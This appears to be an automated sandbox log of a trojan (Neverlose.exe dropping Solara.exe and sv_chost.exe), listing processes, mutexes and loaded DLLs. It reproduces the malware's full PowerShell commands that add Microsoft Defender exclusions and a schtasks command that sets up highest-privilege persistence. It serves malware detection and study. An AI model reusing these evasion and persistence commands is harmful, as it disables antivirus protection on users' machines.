                  Source: Solara.exe.0.dr, vQAPrP9GTLqDP2TnxJeVqWDPZUl80OjDPKWiB9VD1kMfb5r21UVMVWfhd592gHEG8uqxz64WQlAbmJteBo6yNqI0GEgj98oDxc.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: classification engineClassification label: mal100.troj.evad.winEXE@29/31@4/3
                  Source: C:\Users\user\Desktop\Neverlose.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Neverlose.exe.logJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4296:120:WilError_03
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7396:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7840:120:WilError_03
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeMutant created: \Sessions\1\BaseNamedObjects\R6lKB8yQzd1uAv9U
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8072:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4600:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1312:120:WilError_03
                  Source: C:\Users\user\Desktop\Neverlose.exeMutant created: \Sessions\1\BaseNamedObjects\yP4EFLGPJOhez7VB7
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7216:120:WilError_03
                  Source: C:\Users\user\Desktop\Neverlose.exeFile created: C:\Users\user\AppData\Local\Temp\Solara.exeJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: Neverlose.exeVirustotal: Detection: 41%
                  Source: Neverlose.exeReversingLabs: Detection: 73%
                  Source: C:\Users\user\Desktop\Neverlose.exeFile read: C:\Users\user\Desktop\Neverlose.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\Neverlose.exe "C:\Users\user\Desktop\Neverlose.exe"
                  Source: C:\Users\user\Desktop\Neverlose.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe'
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\Neverlose.exeProcess created: C:\Users\user\AppData\Local\Temp\Solara.exe "C:\Users\user\AppData\Local\Temp\Solara.exe"
                  Source: C:\Users\user\Desktop\Neverlose.exeProcess created: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe "C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe"
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe'
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Solara.exe "C:\Users\user\AppData\Local\Temp\Solara.exe"
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Solara.exe'
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Solara.exe "C:\Users\user\AppData\Local\Temp\Solara.exe"
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\sv_chost.exe'
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'sv_chost.exe'
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "sv_chost" /tr "C:\Users\user\AppData\Roaming\sv_chost.exe"
                  Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\sv_chost.exe C:\Users\user\AppData\Roaming\sv_chost.exe
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\sv_chost.exe "C:\Users\user\AppData\Roaming\sv_chost.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\sv_chost.exe "C:\Users\user\AppData\Roaming\sv_chost.exe"
                  Source: C:\Users\user\Desktop\Neverlose.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe'Jump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeProcess created: C:\Users\user\AppData\Local\Temp\Solara.exe "C:\Users\user\AppData\Local\Temp\Solara.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeProcess created: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe "C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe'Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Solara.exe'Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\sv_chost.exe'Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'sv_chost.exe'Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "sv_chost" /tr "C:\Users\user\AppData\Roaming\sv_chost.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeSection loaded: shfolder.dllJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: linkinfo.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: ntshrui.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: cscapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: avicap32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: msvfw32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: rsaenh.dll
